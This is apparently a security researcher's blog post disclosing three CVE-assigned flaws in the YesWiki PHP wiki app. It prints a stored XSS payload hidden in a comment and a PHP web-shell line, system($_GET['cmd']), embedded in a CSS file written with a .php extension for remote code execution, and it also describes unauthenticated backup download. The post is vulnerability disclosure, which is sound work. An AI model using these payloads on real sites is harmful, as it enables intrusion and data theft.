Post

A Very Brief Look at YesWiki

A Very Brief Look at YesWiki

After I created TemplateSearch.io, I was testing it out by searching for random things and I came across several templates for YesWiki. So I Googled it to see exactly what it is because I’ve never heard of it. Turns out it’s a PHP (uses Symfony) Wiki app. I decided to spend a few hours checking it out for security issues with a main goal of RCE or bust, and a secondary goal of exploit chaining/scripting out for impact. I didn’t want to spend too much time on it, since I have eighty-five other things going on, so pardon the lack of technical details, but did I achieve my goals? Read on to find out.

Installation

Clone the repo, navigated to the Docker folder, do a Docker Build then a docker compose up. Simple as that. Then visit http://localhost:8085.

Unauthenticated Site Backup Creation and Download

One of the first things I found is that when visiting certain URLs, you can create a site backup without authentication and then download that backup. See here GitHub.

Stored XSS

In the code, I saw that comments were largely sanitized, however there was a way to sneak some JavaScript into them, which I suppose would subject all users that view the page to XSS.

You can simply put you JS in a comment:

1
/*<script>alert('pizzapower')</script>*/

See here GitHub

Arbitrary File Write to Remote Code Execution

In a certain page of the application, we can create some new CSS stylings. When we do this, we can perform an arbitrary file write of any file type by changing the extension. Change the extension to .php and then we can navigate to the file in the browser for RCE. See here GitHub

The CSS file ends uplooking like this:

1
2
3
4
5
6
7
8
9
10
11
:root {
  --primary-color: <?php system($_GET['cmd']); ?>;
  --secondary-color-1: #d8604c;
  --secondary-color-2: #d78958;
  --neutral-color: #4e5056;
  --neutral-soft-color: #57575c;
  --neutral-light-color: #f2f2f2;
  --main-text-fontsize: 17px;
  --main-text-fontfamily: "Nunito", sans-serif;
  --main-title-fontfamily: 'Nunito', sans-serif;
}

Conclusion

Well, I did have plans for a more technical deep-dive on this. Like, what was the sanitization code that I bypassed, or why aren’t the backup creation URLs protected, but I got busy. Anyway, the vulns described above were given CVE numbers CVE-2025-46346, CVE-2025-46347, and CVE-2025-46348. I barely scratched the surface of this app, so go check it out. It’s a fun wiki app that could have some uses, if you’re in the market for such a thing.

This post is licensed under CC BY 4.0 by the author.